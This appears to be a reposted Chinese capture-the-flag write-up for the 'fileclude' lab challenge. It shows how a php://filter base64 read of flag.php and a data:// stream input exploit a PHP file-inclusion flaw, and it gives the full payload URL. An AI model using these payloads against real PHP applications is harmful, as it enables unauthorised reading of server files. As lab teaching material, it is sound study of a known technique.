0
0

攻防世界-fileclude

场景

在这里插入图片描述
阅读代码后知道存在flag.php,那么flag相关信息肯定就在flag.php中了。但是直接访问flag.php得到的信息只有:
在这里插入图片描述
那么显然易见的就是要配合include(&file)包含用php://filter编码读取flag.php的数据了。同时要满足file_get_contents($file2) === "hello ctf"这一条件。

关于file1

?file1=php://filter/read=convert.base64-encode/resource=flag.php

关于file2

file_get_contents是将文件中数据提取为字符串的函数,它与inclue()一样参数为文件名,所以直接file2=hello%20ctf行不通,要用data://协议构造数据流,使它当作php文件。
?file2=data://text,plain,hello ctf

payload

http://61.147.171.105:55273/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello%20ctf

拿到文件数据的base64
在这里插入图片描述
解码拿到flag
在这里插入图片描述

标签: 网络安全
本文转载自: https://blog.csdn.net/m0_59057526/article/details/126747831
版权归原作者 m0_59057526 所有, 如有侵权,请联系我们删除。
登录后发布评论

“攻防世界-fileclude”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

FunASR:阿里巴巴开源的语音识别工具包,提供预训练模型与详细教程,一键部署多场景应用.

【博主推荐】Microi吾码开源低代码平台,程序员必备开源框架,几行代码直接配置快速建站,快来搭建自己的应用

最强盘点全球AGV明星公司:已覆盖全球91.2%地盘

kafka集群升级新策略,Cloudera专家来揭秘:助你轻松应对大数据挑战

【WEB】深入理解 CORS(跨域资源共享):原理、配置与常见问题

[前端]Javascript中闭包详解(很全!!!)

【MySQL】开发技术深度探索:mysql数据库复合查询全面详解

文章导航